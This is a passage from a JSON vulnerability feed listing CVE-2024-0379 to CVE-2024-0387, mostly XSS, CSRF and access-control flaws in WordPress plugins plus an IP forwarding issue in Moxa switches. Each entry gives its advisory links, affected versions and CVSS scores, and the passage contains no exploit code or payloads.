"lang" : "en", "value" : "The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI chat data when discussion tracking is enabled in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jordymeow:ai_engine:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-02T10:15Z", "lastModifiedDate" : "2025-01-16T18:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0379", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/custom-twitter-feeds/trunk/custom-twitter-feed.php", "name" : "https://plugins.trac.wordpress.org/browser/custom-twitter-feeds/trunk/custom-twitter-feed.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/custom-twitter-feeds/trunk/custom-twitter-feed.php", "name" : "https://plugins.trac.wordpress.org/browser/custom-twitter-feeds/trunk/custom-twitter-feed.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Custom Twitter Feeds – A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:smashballoon:custom_twitter_feeds:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-02-05T18:10Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0380", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Recipe Maker plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 9.1.0 via the 'icon' attribute used in Shortcodes. This makes it possible for authenticated attackers, with contributor-level access and above, to include the contents of SVG files on the server, which can be leveraged for Cross-Site Scripting." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bootstrapped:wp_recipe_maker:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "9.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0381", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-counter.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-counter.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-counter.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-counter.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-date.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-date.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-date.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-date.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of the 'tag' attribute in the wprm-recipe-name, wprm-recipe-date, and wprm-recipe-counter shortcodes in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bootstrapped:wp_recipe_maker:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "9.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-18T08:15Z", "lastModifiedDate" : "2025-06-02T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0382", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to unrestricted use of the 'header_tag' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bootstrapped:wp_recipe_maker:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "9.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0383", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-ingredients.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-ingredients.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-ingredients.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-ingredients.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-instructions.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-instructions.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-instructions.php", "name" : "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-instructions.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/104b3c01-4623-43cb-aed4-16e3be62e1f9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/104b3c01-4623-43cb-aed4-16e3be62e1f9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/104b3c01-4623-43cb-aed4-16e3be62e1f9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/104b3c01-4623-43cb-aed4-16e3be62e1f9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [wprm-recipe-instructions] and [wprm-recipe-ingredients] shortcodes in all versions up to, and including, 9.1.0 due to insufficient restrictions on the 'group_tag' attribute . This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bootstrapped:wp_recipe_maker:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "9.1.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-06-19T09:15Z", "lastModifiedDate" : "2025-02-27T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0384", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Notes in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bootstrapped:wp_recipe_maker:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "9.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0385", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3034410/categorify", "name" : "https://plugins.trac.wordpress.org/changeset/3034410/categorify", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3034410/categorify", "name" : "https://plugins.trac.wordpress.org/changeset/3034410/categorify", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxAddCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add categories." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:frenify:categorify:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.0.7.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-01-08T18:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0386", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch", "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch", "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The weForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Referer' HTTP header in all versions up to, and including, 1.6.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:weformspro:weforms:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.6.22", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-12T22:15Z", "lastModifiedDate" : "2025-01-15T16:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0387", "ASSIGNER" : "psirt@moxa.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0", "name" : "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0", "name" : "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The EDS-4000/G4000 Series prior to version 3.2 includes IP forwarding capabilities that users cannot deactivate. An attacker may be able to send requests to the product and have it forwarded to the target. An attacker can bypass access controls or hide the source of malicious requests." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:moxa:eds-4008_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:moxa:eds-4008:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:moxa:eds-4009_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:moxa:eds-4009:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:moxa:eds-4012_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:moxa:eds-4012:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:moxa:eds-4014_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : 